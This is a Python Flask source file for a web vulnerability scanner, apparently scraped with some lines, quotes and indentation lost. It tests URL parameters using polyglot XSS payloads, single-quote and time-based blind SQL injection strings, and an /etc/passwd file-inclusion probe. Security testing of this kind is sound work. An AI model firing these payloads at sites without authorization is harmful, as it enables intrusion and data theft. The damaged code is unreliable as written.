
119 lines
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# -*- coding: utf-8 -*-
from flask import Flask, request, jsonify
from ghost import Ghost
import requests
import re
app = Flask(__name__)
firefox = Ghost()
Description: inject a polyglot vector for XSS in every parameter, then it checks if an alert was triggered
Parameters: vulns - list of vulnerabilities, url - address of the target, fuzz - parameter we modify
def scan_xss(vulns, url, fuzz):
2016-12-26 12:25:36 +00:00
payload = 'jaVasCript:alert(1)//" name=alert(1) onErrOr=eval(name) src=1 autofocus oNfoCus=eval(name)><marquee><img src=x onerror=alert(1)></marquee>" ></textarea\></|\><details/open/ontoggle=prompt`1` ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>\'-->" ></script><sCrIpt>confirm(1)</scRipt>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>\'"><!--'
payload1 = 'javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img -/style=a:expression&#40&#47&#42\'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"'
with firefox.start() as session:
# Send GET XSS
inject = url.replace(fuzz+"=", fuzz+"="+payload)
page, extra_resources = session.open(inject)
result, resources = session.wait_for_alert(1)
# Detect XSS result with an alert
if result == '1':
print "\t\t\033[93mXSS Detected \033[0m for ", fuzz, " with the payload :", payload
vulns['xss'] += 1
vulns['list'] += 'XSS|TYPE|'+inject+'|DELIMITER|'
print "\t\t\033[94mXSS Failed \033[0m for ", fuzz, " with the payload :", payload
except Exception, e:
print "\t\t\033[94mXSS Failed \033[0m for ", fuzz, " with the payload :", payload
Description: use a single quote to generate a SQL error in the page
Parameters: vulns - list of vulnerabilities, url - address of the target, fuzz - parameter we modify
def scan_sql_error(vulns, url, fuzz):
payload = "'"
inject = url.replace(fuzz+"=", fuzz+"="+payload)
content = requests.get(inject).text
if "Warning: SQLite3:" in content or "You have an error in your SQL syntax" in content:
print "\t\t\033[93mSQLi Detected \033[0m for ", fuzz, " with the payload :", payload
vulns['sql'] += 1
vulns['list'] += 'SQLi|TYPE|'+inject+'|DELIMITER|'
print "\t\t\033[94mSQLi Failed \033[0m for ", fuzz, " with the payload :", payload
Description: use a polyglot vector to detect a SQL injection based on the response time
Parameters: vulns - list of vulnerabilities, url - address of the target, fuzz - parameter we modify
2016-12-26 12:25:36 +00:00
def scan_sql_blind_time(vulns, url, fuzz):
payload = "SleEP(2) /*' || SLeeP(2) || '\" || SLEep(2) || \"*/"
payload0 = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|\"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR\"*/"
2016-12-26 12:25:36 +00:00
Description: will scan every parameter for LFI, checking for the common root:x:0:0
Parameters: vulns - list of vulnerabilities, url - address of the target, fuzz - parameter we modify
def scan_lfi(vulns, url, fuzz):
payload = "/etc/passwd"
inject = re.sub(fuzz+"="+"(.[^&]*)", fuzz+"="+payload , url)
content = requests.get(inject).text
if "root:x:0:0:root:/root:/bin/bash" in content:
print "\t\t\033[93mLFI Detected \033[0m for ", fuzz, " with the payload :", payload
vulns['lfi'] += 1
vulns['list'] += 'LFI|TYPE|'+inject+'|DELIMITER|'
print "\t\t\033[94mLFI Failed \033[0m for ", fuzz, " with the payload :", payload, inject
""" Route /ping
Description: Simple ping implementation to check if the server is up via the extension
def ping():
return "pong"
""" Route /
Description: main route for the flask application, every scan is launched from here
def index():
vulns = {'xss': 0, 'sql': 0, 'lfi': 0, 'list':''}
# Parse requests - extract arguments
args = request.args
url = args['url']
if "?" in url:
params = url.split('?')[1]
regex = re.compile('([a-zA-Z0-9\-_]*?)=')
matches = regex.findall(params)
# Launch scans
for fuzz in matches:
scan_xss(vulns, url, fuzz)
scan_sql_error(vulns, url, fuzz)
scan_sql_blind_time(vulns, url, fuzz)
scan_lfi(vulns, url, fuzz)
# Display results as a json
return jsonify(vulns)
if __name__ == '__main__':
app.run(port=8000, threaded=True, passthrough_errors=False)